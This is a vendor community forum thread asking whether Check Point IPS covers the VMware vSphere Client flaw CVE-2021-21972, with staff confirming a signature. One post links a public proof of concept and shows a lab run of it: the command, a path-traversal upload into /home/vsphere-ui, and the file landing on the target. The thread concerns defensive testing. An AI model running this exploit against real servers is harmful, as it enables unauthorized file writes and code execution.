This website uses cookies. By clicking Accept, you consent to the use of cookies. Click Here to learn more about how we use cookies.
Accept
Reject
ABOUT CHECKMATES & FAQ
Create a Post
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
Help

Are you a member of CheckMates?

×
Sign in with your Check Point UserCenter/PartnerMap account to access more great content and get a chance to win some Apple AirPods! If you don't have an account, create one now for free!
erondicarvalho
Explorer
‎2021-02-25 05:50 AM

Does Check Point has CVE-2021-21972 IPS protection?

Jump to solution
 

Hello 

I have updated IPS on management but I cannot find CVE-2021-21972 signature.

Does Check Point has CVE-2021-21972 IPS protection?

Does Check Point has plan to release this signature?

 

Thank you.

0 Kudos
2 Solutions

Accepted Solutions
_Val_
Admin
Admin
‎2021-02-25 06:03 AM

Jump to solution

The vulnerability was announced yesterday. Until there is a proof of concept, or a working exploit, IPS signature cannot be produced. VMware has posted a workaround here, that you can apply meanwhile

View solution in original post

Avi_Bechor
Employee
Employee
‎2021-02-28 11:35 PM

Jump to solution

Hi,

An IPS protection was released for this vulnerability.
Protection name: "VMware vSphere Client Remote Code Execution (CVE-2021-21972)"

Thanks,
Avi

View solution in original post

5 Replies
_Val_
Admin
Admin
‎2021-02-25 06:03 AM

Jump to solution

The vulnerability was announced yesterday. Until there is a proof of concept, or a working exploit, IPS signature cannot be produced. VMware has posted a workaround here, that you can apply meanwhile

Sigbjorn
Advisor
‎2021-02-28 10:40 PM
In response to _Val_

Jump to solution

This exploit is in the wild now.

Proof of Concept available on github; https://github.com/horizon3ai/CVE-2021-21972

Any updates on IPS signatures?

 

 

0 Kudos
Avi_Bechor
Employee
Employee
‎2021-02-28 11:35 PM

Jump to solution

Hi,

An IPS protection was released for this vulnerability.
Protection name: "VMware vSphere Client Remote Code Execution (CVE-2021-21972)"

Thanks,
Avi

Sigbjorn
Advisor
‎2021-03-01 01:02 AM
In response to Avi_Bechor

Jump to solution

I don't seem to have any luck triggering this protection.

Testing at home:

Check Point 3100 - R80.40 JHA91
[Expert@cp-fw01:0]# ips stat
IPS Status: Enabled
Active Profiles:
Custom Optimized
IPS Update Version: 635211403
Global Detect: Off
Bypass Under Load: Off

Second test:

VSX R80.30 JHA 227 (Open server)

[Expert@<vsxhostname>:<vsid>]# ips stat
IPS Status: Enabled
IPS Update Version: 635211403
Global Detect: Off
Bypass Under Load: Off

 

In the test, I'm just running the PoC Code from Github.

x@y:~/CVE-2021-21972$ python3 poc.py -t 10.99.9.9 -f testfile.txt -p /home/vsphere-ui/testfile.txt -o unix
[+] 10.99.9.9 vulnerable to CVE-2021-21972!
[+] Adding testfile.txt as ../../../../../home/vsphere-ui/testfile.txt to archive
[+] Wrote testfile.txt to exploit.tar on local filesystem
[+] File uploaded successfully

 

root@photon-machine [ ~ ]# cd /home/vsphere-ui/
root@photon-machine [ /home/vsphere-ui ]# ls
testfile.txt
root@photon-machine [ /home/vsphere-ui ]# cat testfile.txt
test
root@photon-machine [ /home/vsphere-ui ]#

 

 

0 Kudos
Avi_Bechor
Employee
Employee
‎2021-03-01 03:21 AM
In response to Sigbjorn

Jump to solution

Hi,

The PoC you shared is blocked based on our internal testing, I am taking this with you offline to ensure that you configured the testing correctly

Avi

0 Kudos